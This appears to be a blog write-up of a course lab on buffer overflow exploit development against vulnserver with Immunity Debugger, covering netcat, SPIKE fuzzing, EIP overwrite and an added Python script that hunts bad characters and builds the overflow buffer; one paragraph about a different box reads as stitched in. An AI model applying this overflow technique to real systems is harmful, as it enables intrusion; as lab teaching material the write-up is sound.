Here we started getting an introduction to some new tools: vulnserver and Immunity Debugger. We did this as an introduction to exploit development. So the first thing you need to do is go out and download both vulnserver and Immunity Debugger. Once you have them, run both vulnserver and Immunity Debugger as administrator, then attach vulnserver to Immunity Debugger and press play. Make sure the bottom right says "Running". Here we use "nc" with "-nv" and the IP address of the target server on port 9999 to connect, and then we use "HELP" to print out all the valid commands. Here we use the command "generic_send_tcp" with the target's IP address, port 9999 and trun.spk. Now to be honest I don't 100% remember what the following 2 zeros are for, as this was a few weeks ago and like many people I don't remember every single detail (hence the screenshots and this blog). They are SPIKE's SKIPVAR and SKIPSTR arguments, which tell generic_send_tcp which variable and which string in the .spk script to start fuzzing from; 0 0 means start from the beginning. And here you see it's paused again because we have ju...
Now this exploit was a little hard for my rig, just because I do not have the most RAM and it required slightly more than the others, so I took fewer screenshots. This again is the same step as the others: figuring out what ports were available. Here we are using "ffuf" again. Now I believe this is the first time we used "dnsrecon". And here we add the DNS name to our machine's hosts file so we can perform the attack. Follow me on LinkedIn or Twitter.
I wrote a script for bad chars and show how I overwrite the program. This is all leading up to finding the right module and then getting shellcode to run. Exploit development is definitely something I want to take some more time to get to know. I plan on going through these videos at least one more time. So a couple of things to remember: take out "\x00" and make sure you wrap the bad-char string in "()". Here is the first code I wrote, and here is the correct code. Anyone catch the mistake? That's right, line 9 I forgot to change. Now remember, like with all the lessons before, we are running both vulnserver and Immunity Debugger as admin, attaching vulnserver to Immunity Debugger and pressing play. The goal is to overflow the buffer, past the EBP (Extended Base Pointer) and into the EIP (Extended Instruction Pointer), which we overwrite with an address that redirects execution to our malicious code. And as you can see it is now paused, meaning we got the overflow and crashed vulnserver....
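The bad-character step and the buffer layout described above, as an added example written for this post (not the author's script or course code). Instead of typing the byte literal out, badchar_string generates every value with "\x00" left out; build_overflow lays filler up to EIP, then the return address, then the test bytes, so they land where ESP points after the crash; first_bad_char compares what was sent against what the debugger shows in memory, and hunt_bad_chars removes one bad byte per round the way the page's workflow does. The fake_target function is a constructed stand-in for that memory dump: it drops "\x0a" and turns "\x0d" into "\x00", which is made up for the demo and is not what vulnserver actually does. The offset of 2003 and the return address are placeholders to be replaced with the values found with a cyclic pattern and mona.

```python
import struct

OFFSET = 2003            # assumption: filler bytes before EIP, found with a cyclic pattern
RET_ADDR = 0x625011AF    # assumption: placeholder address, e.g. a JMP ESP located with mona


def badchar_string(excluded=()):
    """Every byte value 0x01..0xff in order, minus bytes already known to be bad.
    \\x00 is never included: it is the C string terminator, so it would cut the
    buffer off before the rest of the bytes reach the stack. (If you type this
    literal out by hand across several lines instead, wrap the pieces in ()
    so Python joins them into one string.)"""
    skip = set(excluded) | {0x00}
    return bytes(b for b in range(256) if b not in skip)


def build_overflow(test_bytes, offset=OFFSET, ret=RET_ADDR):
    """Buffer layout: filler up to EIP, the return address (packed little-endian so
    it reads correctly in the debugger), then the bytes under test, which sit at ESP."""
    return b"TRUN /.:/" + b"A" * offset + struct.pack("<I", ret) + test_bytes


def first_bad_char(sent, in_memory):
    """Compare what was sent with what the debugger shows at ESP after the crash
    (the hex dump, or a mona compare). Returns the first byte that did not survive,
    or None if all did. Only the first mismatch is trustworthy: once a byte is
    altered or dropped everything behind it shifts, so remove one bad byte,
    resend, and look again."""
    for i, b in enumerate(sent):
        if i >= len(in_memory) or in_memory[i] != b:
            return b
    return None


def hunt_bad_chars(dump_after_crash):
    """Repeat send/compare until the test string survives intact.
    dump_after_crash(test_bytes) -> bytes seen at ESP for that test string."""
    bad = {0x00}
    while True:
        sent = badchar_string(bad)
        culprit = first_bad_char(sent, dump_after_crash(sent))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)            # each round adds a byte from `sent`, so this terminates


def fake_target(test_bytes):
    """Constructed stand-in for the memory dump: assume the server drops \\x0a and
    turns \\x0d into \\x00. Made up for the demo, not vulnserver's real behaviour."""
    out = bytearray()
    for b in test_bytes:
        if b == 0x0A:
            continue
        out.append(0x00 if b == 0x0D else b)
    return bytes(out)


if __name__ == "__main__":
    found = hunt_bad_chars(fake_target)
    print("bad chars:", " ".join(f"\\x{b:02x}" for b in found))
    clean = badchar_string(found)
    print("final test string is", len(clean), "bytes; whole buffer is",
          len(build_overflow(clean)), "bytes")
```

Against a real target the dump_after_crash step is you: send build_overflow(badchar_string(bad)), read the bytes at ESP in Immunity Debugger, and feed them to first_bad_char. Every byte the hunt returns must also be excluded when the shellcode is generated later, or the payload will be mangled the same way.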